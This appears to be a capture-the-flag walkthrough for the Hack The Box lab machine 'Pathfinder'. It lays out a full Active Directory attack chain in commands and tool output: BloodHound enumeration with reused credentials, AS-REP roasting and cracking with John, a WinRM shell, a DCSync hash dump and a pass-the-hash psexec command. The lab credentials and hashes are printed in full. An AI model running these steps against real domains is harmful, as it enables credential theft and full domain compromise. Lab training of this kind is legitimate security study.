HTB Starting Point – Pathfinder

 $./ennumeration.sh

[+] 10.10.10.30 scan started...

[-] Open ports : 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49673,49676,49677,49683,49698,49720 found

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 22:39 CEST
Stats: 0:02:33 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.81% done; ETC: 22:41 (0:00:00 remaining)
Nmap scan report for 10.10.10.30
Host is up (0.042s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-05-22 03:42:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/21%Time=5EC6E703%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h02m38s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-05-22T03:44:26
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 278.22 seconds
[+] 10.10.10.30 scan finished...

Open ports detected: 

88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-23 23:54:30Z)

389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)

3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • WinRM 2.0 (Microsoft Windows Remote Management) uses port 5985/tcp for HTTP and 5986/tcp for HTTPS by default. 

Using the credentials we obtained in a previous machine; sandra:Password1234!, we can attempt to enumerate Active Directory. 
We can achieve this using BloodHound. There is a python bloodhound ingester, which can be found here


We can attempt to enumerate Active Directory.

Try using old machine credentials…

BloodHound is a single page Javascript web application that uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.

https://github.com/fox-it/BloodHound.py

BloodHound.py is a Python-based ingestor for BloodHound, based on Impacket.

pip install bloodhound

/usr/share/python-wheels/pkg_resources-0.0.0-py3-none-any.whl/pkg_resources/py2_warn.py:21: UserWarning: Setuptools will stop working on Python 2
************************************************************
You are running Setuptools on Python 2, which is no longer
supported and
>>> SETUPTOOLS WILL STOP WORKING <<<
in a subsequent release (no sooner than 2020-04-20).
Please ensure you are installing
Setuptools using pip 9.x or later or pin to `setuptools<45`
in your environment.
If you have done those things and are still encountering
this message, please follow up at
https://bit.ly/setuptools-py2-warning.
************************************************************
WARNING: pip is being invoked by an old script wrapper. This will fail in a future version of pip.
Please see https://github.com/pypa/pip/issues/5599 for advice on fixing the underlying issue.
To avoid this problem you can invoke Python with '-m pip' instead of running pip directly.
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting bloodhound
  Downloading bloodhound-1.0.5-py2-none-any.whl (64 kB)
     |████████████████████████████████| 64 kB 1.8 MB/s
Collecting ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5
  Downloading ldap3-2.7-py2.py3-none-any.whl (420 kB)
     |████████████████████████████████| 420 kB 8.2 MB/s
Requirement already satisfied: pyasn1>=0.4 in /usr/lib/python2.7/dist-packages (from bloodhound) (0.4.2)
Collecting dnspython
  Downloading dnspython-1.16.0-py2.py3-none-any.whl (188 kB)
     |████████████████████████████████| 188 kB 18.7 MB/s
Requirement already satisfied: impacket>=0.9.17 in /usr/lib/python2.7/dist-packages (from bloodhound) (0.9.20)
Requirement already satisfied: future in /usr/lib/python2.7/dist-packages (from bloodhound) (0.18.2)
Collecting ldapdomaindump>=0.9.0
  Downloading ldapdomaindump-0.9.2-py2-none-any.whl (21 kB)
ERROR: impacket 0.9.20 has requirement ldap3==2.5.1, but you'll have ldap3 2.7 which is incompatible.
Installing collected packages: ldap3, dnspython, bloodhound, ldapdomaindump
Successfully installed bloodhound-1.0.5 dnspython-1.16.0 ldap3-2.7 ldapdomaindump-0.9.2

To solve this error: 

$bloodhound-python -d megacorp.local -u sandra -p "Password1234!" -gc pathfinder.megacorp.local -c all -ns 10.10.10.30

INFO: Found AD domain: megacorp.local
INFO: Connecting to LDAP server: Pathfinder.MEGACORP.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: Pathfinder.MEGACORP.LOCAL
INFO: Found 5 users
INFO: Connecting to GC LDAP server: pathfinder.megacorp.local
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Pathfinder.MEGACORP.LOCAL
INFO: Done in 00M 08S

Installing and Starting BloodHound

configure the neo4j service.

$ neo4j console

http://localhost:7474

$ bloodhound --no-sandbox

import *.json files previously obtained.

Useful queries: Shortest Paths to High value Targets & Find Principles with DCSync Rights

We can see that the svc_bes has GetChangesAll privileges to the domain.
GetChangesAll means that user svc_bes can request replication data from the domain controller. 

Lateral movement

Checking if Kerberos pre-authentication has been disabled for this account, which means it is vulnerable to ASREPRoasting.
We can check this using a tool such as Impacket’s GetNPUsers.

Impacket install
Download
$pip install .

$GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30

Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc_bes
$krb5asrep$23$svc_bes@MEGACORP.LOCAL:8595b5809d50f5384d5d1258800b4560$bfec96893654506cf83359b8bd7bc6acb68221440f28c995f710d8a4bd99a83ef2c4b6b97d45026b7208f11b6ef4d7526cc1e581ad231d2066efba79b21e70b4ee9c29588512cd664113c1b510414c4271e623dae8b581d95ef0c333359266df1e373f866c798572f0b3ef5924f35d3b05516924af3d9b9f411f74180ab850ccebbcda27e339dcc1ef8e71a89ab0c1fefb84429c65eed176781b8f2f881ef0064dacba7e50040c4315deb4cd66986d7f895fee53c5931962ca6c2278c7498b28a86840c622ca16c4057035157b1e7e42063316ce86958a5c68c2a3343b9e6d801994d7295634bb2e97d9d70c5401903f

This is the Kerberos Ticket Granting Ticket for the user svc_bes.

Save this ticket to a new file.

$vim svc_bes.hash

Use John the Ripper to obtain the password from the hash.

$john svc_bes.hash -wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sheffield19      ($krb5asrep$23$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:09 DONE (2020-05-24 12:46) 0.1049g/s 1112Kp/s 1112Kc/s 1112KC/s Sherbear94..Sheepy04
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now we’ve obtained svc_bes credentials (username = svc_bes; password Sheffield19)

Then we can use WinRM to access with svc_bes credentials

https://github.com/diyan/pywinrm
(if you want to use it in your python scripts)

https://github.com/Hackplayers/evil-winrm
(stand-alone WinRM shell)

 $sudo gem install evil-winrm

 $evil-winrm -i 10.10.10.30 -u svc_bes -p Sheffield19

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_bes\Documents> dir
*Evil-WinRM* PS C:\Users\svc_bes\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc_bes> cd Desktop
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> dir

    Directory: C:\Users\svc_bes\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/25/2020   2:35 PM             32 user.txt

*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt
b05fXXXXXXXXXXXXXXXXXXXXXXXXXXXX
*Evil-WinRM* PS C:\Users\svc_bes\Desktop>

Privilege escalation

To leverage the GetChangesAll permission, we can use Impacket’s secretsdump.py to perform a DCSync attack and dump the NTLM hashes of all domain users.

DCSync is a late-stage kill chain attack that allows an attacker to simulate the behavior of Domain Controller (DC) in order to retrieve password data via domain replication. Once an attacker has access to a privileged account with domain replication rights, the attacker can utilize replication protocols to mimic a domain controller. 

https://blog.stealthbits.com/what-is-dcsync-an-introduction/

NT LAN Manager (NTLM) is the Microsoft authentication protocol that was created to be the successor of LM.

http://techgenix.com/how-cracked-windows-password-part1/

$secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30

Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:174b5eb9a4d332fa875cdf74bdae989a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1-96:8ad500da727e5eb0936cd31810b58404e64545d268039c3794768f3d3839b3ad
PATHFINDER$:aes128-cts-hmac-sha1-96:f0b3b715b15cf4e546bc40c66b00b482
PATHFINDER$:des-cbc-md5:708567e980a7a285
[*] Cleaning up...

Using the default domain administrator NTLM hash, we can use this in a PTH attack to gain elevated access to the system.

A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. 

https://www.beyondtrust.com/resources/glossary/pass-the-hash-pth-attack

We can use Impacket’s psexec.py

psexec.py megacorp.local/administrator@10.10.10.30 -hashes 500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::

 $psexec.py megacorp.local/administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *